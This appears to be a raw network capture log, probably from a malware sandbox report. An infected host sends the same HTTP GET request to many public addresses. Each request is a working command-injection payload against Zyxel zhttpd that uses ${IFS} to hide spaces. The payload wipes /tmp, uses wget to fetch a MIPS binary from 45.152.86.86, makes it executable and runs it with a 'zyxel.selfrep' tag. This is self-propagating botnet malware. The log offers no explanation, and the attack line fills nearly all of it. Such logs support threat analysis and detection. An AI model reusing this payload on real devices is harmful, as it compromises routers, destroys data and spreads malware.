                                        Mar 31, 2024 09:20:48.472825050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2514192.168.2.235325891.167.64.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472866058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2515192.168.2.2357808195.222.80.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480488062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2516192.168.2.2359988222.168.196.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480526924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2517192.168.2.23392588.104.83.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480578899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2518192.168.2.2357260179.59.191.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480629921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2519192.168.2.2346766178.28.70.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480675936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2520192.168.2.2358158144.132.254.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480721951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2521192.168.2.2348718189.142.229.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:49.480917931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2522192.168.2.233410695.235.129.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487263918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2523192.168.2.2336350119.190.134.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487306118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2524192.168.2.2345462204.193.80.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487355947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2525192.168.2.2354156142.123.27.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487410069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2526192.168.2.23577105.166.157.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487472057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2527192.168.2.2332994142.12.145.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487493038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2528192.168.2.233877066.252.164.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487550020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2529192.168.2.2340858107.120.251.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487605095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2530192.168.2.2333028108.229.65.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487638950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2531192.168.2.233815281.9.197.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487660885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2532192.168.2.2356858122.233.241.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487721920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2533192.168.2.2355924211.241.71.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487756014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2534192.168.2.234151273.13.127.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487803936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2535192.168.2.2346560101.219.67.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487838984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2536192.168.2.2355220139.77.229.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487896919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2537192.168.2.2359040111.136.212.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487941980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2538192.168.2.2340266219.253.114.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.487989902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2539192.168.2.2351542101.49.197.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488051891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2540192.168.2.234131091.57.157.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488104105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2541192.168.2.235112444.44.188.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488162041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2542192.168.2.2346758168.223.150.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488188982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2543192.168.2.2337514106.197.95.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488236904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2544192.168.2.234167466.131.72.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488292933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2545192.168.2.233622476.38.135.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488327980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2546192.168.2.2350052190.162.63.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488406897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2547192.168.2.234669027.223.168.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488445997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2548192.168.2.23446288.137.46.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488502979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2549192.168.2.2339704147.205.134.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488538980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2550192.168.2.234301414.178.32.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488588095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2551192.168.2.235271018.187.172.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488627911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2552192.168.2.2359884180.39.119.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488668919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2553192.168.2.236034445.155.205.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488713026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2554192.168.2.235699294.61.104.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488765001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2555192.168.2.233893483.66.241.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488814116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2556192.168.2.234528281.197.220.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488847971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2557192.168.2.235949091.151.147.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488907099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2558192.168.2.2358290192.76.173.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488957882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2559192.168.2.2357200196.91.234.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.488995075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2560192.168.2.234691086.140.89.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489032984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2561192.168.2.2354562147.193.208.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489077091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2562192.168.2.234055435.215.78.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489110947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2563192.168.2.233608443.84.44.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489150047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2564192.168.2.2343270148.70.227.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489200115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2565192.168.2.2359300157.24.91.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489258051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2566192.168.2.2356120189.71.148.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489298105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2567192.168.2.236002832.43.46.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489347935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2568192.168.2.2336824162.121.129.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489398003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2569192.168.2.2350082142.242.26.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489437103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2570192.168.2.2347104123.66.87.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489484072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2571192.168.2.2352716117.226.200.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489547968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2572192.168.2.234319491.42.173.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489584923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2573192.168.2.2347874168.254.71.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489634037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2574192.168.2.2360506211.74.189.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489675999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2575192.168.2.235021647.192.198.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489722967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2576192.168.2.235420251.2.80.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489763021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2577192.168.2.2348868207.241.145.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489783049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2578192.168.2.2347028118.30.17.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489809990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2579192.168.2.2338558130.196.107.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489861965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2580192.168.2.235820817.30.220.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:50.489895105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2581192.168.2.233768618.58.213.54443
                                        TimestampBytes transferredDirectionData
